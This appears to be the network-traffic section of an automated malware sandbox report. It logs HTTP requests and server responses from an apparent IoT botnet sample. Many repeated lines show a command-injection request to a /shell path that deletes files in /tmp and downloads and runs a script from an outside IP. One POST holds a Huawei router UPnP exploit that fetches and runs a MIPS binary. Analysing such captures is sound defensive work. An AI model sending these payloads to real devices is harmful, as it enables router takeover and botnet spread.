              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: unknownDNS traffic detected: queries for: ezleaks.com
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jan 2024 05:23:50 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveKeep-Alive: timeout=119Server: VM-128-24-centosData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlAccept-Ranges: bytesServer: HFS 2.3mSet-Cookie: HFS_SID_=0.837759754853323; path=/; HttpOnly
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 02 Jan 2024 05:23:54 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:23:58 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jan 2024 05:24:01 GMTContent-Type: application/json; charset=utf-8Connection: keep-aliveContent-Length: 48X-Kong-Response-Latency: 0Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 6e 6f 20 52 6f 75 74 65 20 6d 61 74 63 68 65 64 20 77 69 74 68 20 74 68 6f 73 65 20 76 61 6c 75 65 73 22 7d Data Ascii: {"message":"no Route matched with those values"}
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jan 2024 05:24:03 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: Byte-nginxData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 17 Dec 2017 07:47:25 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:24:05 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:24:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Tue, 02 Jan 2024 05:24:11 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:03:11 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:24:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
